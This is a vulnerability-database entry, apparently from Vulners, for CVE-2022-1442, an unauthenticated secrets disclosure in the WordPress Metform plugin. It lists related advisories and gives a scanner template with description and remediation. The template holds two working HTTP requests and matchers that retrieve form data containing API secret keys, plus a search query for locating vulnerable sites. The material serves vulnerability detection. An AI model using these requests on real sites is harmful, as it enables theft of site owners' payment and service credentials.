| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2022-1442 | 11 May 202200:33 | – | circl | |
| WordPress plugin Metform 安全漏洞 | 10 May 202200:00 | – | cnnvd | |
| WordPress plugin Metform information leakage vulnerability | 11 May 202200:00 | – | cnvd | |
| CVE-2022-1442 | 10 May 202219:30 | – | cve | |
| CVE-2022-1442 Metform Elementor Contact Form Builder <= 2.1.3 - Sensitive Information Disclosure | 10 May 202219:30 | – | cvelist | |
| Exploit for Missing Authorization in Wpmet Metform_Elementor_Contact_Form_Builder | 3 Aug 202310:47 | – | githubexploit | |
| CVE-2022-1442 | 10 May 202220:15 | – | nvd | |
| WordPress Metform Elementor Contact Form Builder Plugin < 2.1.4 Information Disclosure Vulnerability | 2 Mar 202300:00 | – | openvas | |
| CVE-2022-1442 | 10 May 202220:15 | – | osv | |
| WordPress Metform Elementor Contact Form Builder plugin <= 2.1.3 - Unauthenticated API keys and Secrets Disclosure vulnerability | 23 Apr 202200:00 | – | patchstack |
id: CVE-2022-1442
info:
name: WordPress Metform <=2.1.3 - Information Disclosure
author: theamanrawat
severity: high
description: |
WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
remediation: |
Upgrade to the latest version of the Metform plugin (>=2.1.4) to fix the information disclosure vulnerability.
reference:
- https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
- https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b
- https://wordpress.org/plugins/metform/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1442
- https://plugins.trac.wordpress.org/changeset/2711944/metform/trunk/core/forms/action.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1442
cwe-id: CWE-862
epss-score: 0.09699
epss-percentile: 0.94931
cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpmet
product: metform_elementor_contact_form_builder
framework: wordpress
google-query: inurl:/wp-content/plugins/metform
tags: cve,cve2022,wpscan,wordpress,wp-plugin,disclosure,unauth,metform,wp,wpmet,vuln
http:
- raw:
- |
GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "mf_recaptcha_secret_key"
- "admin_email_from"
condition: and
- type: word
part: header_2
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
name: id
group: 1
regex:
- '<option value=\"([0-9]+)\"'
internal: true
# digest: 4a0a00473045022100c6ae9f0491346889add1decb4cd76f5c7520871cf360bd2b6652c3ca906613520220621c1d55dd6dcdc4c95287f18fc336754f41ce66f0ff93e865cb83aee4b41748:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation